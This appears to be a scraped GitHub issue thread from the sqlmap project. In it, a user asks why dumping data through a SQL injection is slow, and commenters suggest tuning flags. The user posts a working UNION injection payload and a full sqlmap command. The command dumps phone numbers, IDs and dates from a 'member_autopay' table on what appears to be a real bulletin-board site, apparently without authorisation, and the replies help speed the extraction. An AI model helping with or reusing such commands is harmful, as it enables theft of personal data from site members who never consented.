Sqlmap: Sqlmap Dump so slow...

Created on 24 Apr 2019  路  12Comments  路  Source: sqlmapproject/sqlmap

I already got all columns and then i chose something using -C option for Union Query
But Dump too slow... how can i do this... 1 columns get 5second... very slow... how...

invalid

Most helpful comment

disable --delay
set to lower value --time-sec ?

All 12 comments

You failed to fill the Issue template. Currently, there is nothing useful inside the current description

try --threads 10 --null-connection --keep-alive ?

--predict-output it may works too

disable --delay
set to lower value --time-sec ?

my method POST type... cant use null-connection...

Parameter: #1* ((custom) POST)
Type: UNION query
Title: Generic UNION query (random number) - 1 column
Payload: /bbs/board.php?bbs=win04&bbs=win01&idx=20968&page=&sfield=if(now()=sysdate(),sleep(0),0)/-5518 UNION ALL SELECT 5746,CONCAT(0x716b787071,0x67726a6c454c636547425073774352424b435871534e67477570695050566e4666784247654d6f47,0x716a767871)-- hpaQ'XOR(if(now()=sysdate(),sleep(0),0))OR'XOR(if(now()=sysdate(),sleep(0),0))OR/&svalue=%_st HTTP/1.1

disable --delay
set to lower value --time-sec ?

still cant... omg...

show me what you typed

command

command

sqlmap.py -u "........./bbs/board.php" -p "sfield" --method="POST" --data="/bbs/board.php?bbs=win04&bbs=win01&idx=20968&page=&sfield=if(now()=sysdate()%2csleep(0)%2c0)/'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"/&svalue=%_st HTTP/1.1" --dbms=mysql --batch -D sike4u -T member_autopay -C hp,id,idx,wdate --dump --technique U --banner --threads 10 --start=513344 --delay=1

try --keep-alive ?... ^^''

try --keep-alive ?... ^^''

still slow...

-hh add oil~!馃槂

Was this page helpful?
0 / 5 - 0 ratings

Related issues

ethicalhack3r picture ethicalhack3r  路  3Comments

ashwinvin picture ashwinvin  路  4Comments

dodek picture dodek  路  3Comments

serdaresen06 picture serdaresen06  路  4Comments

mekoki88 picture mekoki88  路  6Comments